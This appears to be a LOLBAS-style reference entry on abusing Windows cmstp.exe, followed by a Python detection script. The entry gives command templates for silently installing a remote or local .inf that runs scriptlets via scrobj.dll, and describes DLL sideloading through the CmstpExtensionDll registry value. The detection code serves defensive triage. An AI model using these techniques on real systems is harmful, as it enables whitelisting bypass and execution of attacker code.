Cmstp.exe

Installs or removes a Connection Manager service profile.

AWL Bypass

Execute code hidden within an .inf file. Execute code directly from the Internet.

cmstp.exe /ni /s {REMOTEURL:.inf}

Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains an UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. — MITRE: T1218.003 — Privileges: User

Execute

Execute code hidden within an .inf file. Download and run scriptlets from the Internet.

cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}

Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains an UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. — MITRE: T1218.003 — Privileges: User

Proxy execution of a malicious DLL via registry modification.

cmstp.exe /nf

cmstp.exe reads the `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe\CmstpExtensionDll` registry value and passes its data directly to `LoadLibrary`. Setting this registry value to the path of an attacker-controlled DLL causes `cmstp.exe` to sideload that DLL. — MITRE: T1218.003 — Privileges: Administrator
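
A detection-side triage of the three usages listed above, added here as an example and not part of the original entry: it flags `cmstp.exe` command lines that combine `/s` with an .inf argument, marks remote .inf sources, flags `/nf`, and flags writes to the `CmstpExtensionDll` value. The event dictionaries, finding names, sample paths and URL are constructed; treating `-` as a switch prefix and UNC paths as remote are assumptions.

```python
import re

# Registry value named above; cmstp.exe passes its data to LoadLibrary.
EXT_DLL_VALUE = r"\app paths\cmmgr32.exe\cmstpextensiondll"
PREFIX = ("/", "-")  # assumption: '-' is treated like '/' to be conservative

def check_process(cmdline):
    """Findings for one process-creation command line."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not tokens or tokens[0].lower().rsplit("\\", 1)[-1] not in ("cmstp", "cmstp.exe"):
        return []
    switches = {t[1:].lower() for t in tokens[1:] if t[:1] in PREFIX}
    infs = [t for t in tokens[1:] if t[:1] not in PREFIX and t.lower().endswith(".inf")]
    findings = []
    if "s" in switches and infs:  # silent install of an .inf
        findings.append("silent-inf-install")
    # Assumption: a UNC path counts as remote alongside http(s) URLs.
    if any(re.match(r"(?i)(https?://|\\\\)", i) for i in infs):
        findings.append("remote-inf")
    if "nf" in switches:  # follow up by reading the registry value
        findings.append("nf-switch")
    return findings

def check_registry(target, details):
    """Findings for one registry value-set event."""
    if target.lower().endswith(EXT_DLL_VALUE):
        return ["cmstp-extension-dll-set:" + details]
    return []

def triage(events):
    """Return (event id, findings) for every event with at least one finding."""
    scored = [(ev["id"], check_process(ev["cmdline"]) if ev["kind"] == "process"
               else check_registry(ev["target"], ev["details"])) for ev in events]
    return [(i, hits) for i, hits in scored if hits]

# Constructed sample events; paths, URL and field names are hypothetical.
KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe"
SAMPLE = [
    {"id": 1, "kind": "process", "cmdline": "cmstp.exe /ni /s https://example.test/p.inf"},
    {"id": 2, "kind": "process", "cmdline": r'"C:\Windows\System32\cmstp.exe" /ni /s "C:\Users\Public\vpn p.inf"'},
    {"id": 3, "kind": "registry", "target": KEY + r"\CmstpExtensionDll", "details": r"C:\Users\Public\ext.dll"},
    {"id": 4, "kind": "process", "cmdline": r"C:\Windows\System32\cmstp.exe /nf"},
    {"id": 5, "kind": "process", "cmdline": r"notepad.exe C:\temp\cmstp.inf"},
]

if __name__ == "__main__":
    for ev_id, hits in triage(SAMPLE):
        print(ev_id, hits)
```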